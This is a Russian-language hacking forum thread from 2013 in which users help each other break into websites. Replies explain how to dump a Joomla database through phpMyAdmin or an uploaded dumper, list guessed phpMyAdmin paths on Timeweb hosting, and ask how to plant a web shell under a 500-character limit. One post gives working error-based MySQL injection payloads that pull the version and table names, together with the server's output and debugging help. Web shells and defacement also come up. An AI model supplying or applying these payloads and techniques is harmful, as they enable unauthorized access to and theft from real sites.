
09.10.2013, 15:31
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от mff
Ребят, подскажите как слить базу данных jumla имея логин, пароль и имя базы? Хостинг Timeweb.
попытаться найти sql-inject, если phpmyadmin на сайте не стоит
|
|
|

09.10.2013, 15:36
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от mff
Ребят, подскажите как слить базу данных jumla имея логин, пароль и имя базы? Хостинг Timeweb.
1. Воспользоваться PhpMyAdmin. (вкладка Export).
2. Залить дампер и слить базу (что-то типа Sypex Dumper и т.д.).
|
|
|

09.10.2013, 15:38
|
|
Познающий
Регистрация: 03.09.2006
Сообщений: 68
С нами:
10361097
Репутация:
229
|
|
Сообщение от er9j6@
попытаться найти sql-inject, если phpmyadmin на сайте не стоит
http://sypex.net/ ?
|
|
|

09.10.2013, 16:30
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Сообщение от YaBtr
Воспользоваться PhpMyAdmin.
Я так и хотел сделать, но вот как узнать путь к phpmyadmin ?
|
|
|

09.10.2013, 17:10
|
|
Участник форума
Регистрация: 07.09.2013
Сообщений: 173
С нами:
6674006
Репутация:
19
|
|
Сообщение от mff
Я так и хотел сделать, но вот как узнать путь к phpmyadmin ?
Ну во-первых, если коннект к базе разрешен извне, можешь залить PhpMyAdmin на любой свой сервер, в конфиге вместо localhost прописать IP сайта / логин и пароль / авторизация http. Или через любые другие утилиты умеющие подключаться к MySQL.
Если с удаленным подключением фейл, можно попробовать типовые пути, вдруг есть на сервере:
1. В корне сайта и в каталоге admin если есть - /pma/, /phpmyadmin/, /myadmin/
2. Те же варианты, только на субдомене - pma.site.com
3. Если это хостинг на базе ISP (только прописывай именно IP а не доменное имя) - https://127.0.0.1/myadmin/
|
|
|

09.10.2013, 17:25
|
|
Познавший АНТИЧАТ
Регистрация: 12.03.2008
Сообщений: 1,379
С нами:
9560486
Репутация:
1809
|
|
Сообщение от Sum.cogitans
2. Те же варианты, только на субдомене - pma.site.com
Да, там у них в зависимости от тарифа, имена имеют вид: https:// bitrix132.timeweb.ru/pma/index.php и так далее.
|
|
|

09.10.2013, 17:49
|
|
Участник форума
Регистрация: 07.09.2013
Сообщений: 173
С нами:
6674006
Репутация:
19
|
|
Сообщение от mff
Да, там у них в зависимости от тарифа, имена имеют вид: https://
bitrix132
.timeweb.ru/pma/index.php и так далее.
У timeweb в зоне субдомена логин или целая площадка? Если площадка возможно повезет:
HTTP
http://phoenix.timeweb.ru/phpMyAdmin/
http://scorpius.timeweb.ru/phpMyAdmin/
HTTPS
https://phoenix.timeweb.ru/pma/
https://scorpius.timeweb.ru/pma/
|
|
|

09.10.2013, 21:14
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
могу редактировать несколько php файлов на сервере
но к сожалению там ограничение в 500 символов кода
подскажите как можно залить шелл??
|
|
|

10.10.2013, 03:32
|
|
Познающий
Регистрация: 08.02.2012
Сообщений: 72
С нами:
7504886
Репутация:
0
|
|
делают такой зпрос
'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'
вывод:
Duplicate column name '5.1.69'
отправляю такой запрос
'and(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+1, 1),floor(rand(0)*2))x+from+information_schema.tabl es+group+by+x)a)='1/
вывод:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 1
в чем дело?
|
|
|

10.10.2013, 04:24
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Always
делают такой зпрос
'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and'
вывод:
Duplicate column name '5.1.69'
отправляю такой запрос
'and(select+1+from(select+count(*),concat((select+ table_name+from+information_schema.tables+limit+1, 1),floor(rand(0)*2))x+from+information_schema.tabl es+group+by+x)a)='1/
вывод:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+fr om+information_schema.tables+li' at line 1
в чем дело?
В том, что твои "плюсы" отправляются напрямую в субд.
2 Oxotnik, эвал без палива? Что еще, по-твоему мнению, "без палива"? с99/r57 в корне или, быть может, дефейс главной ресурса?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|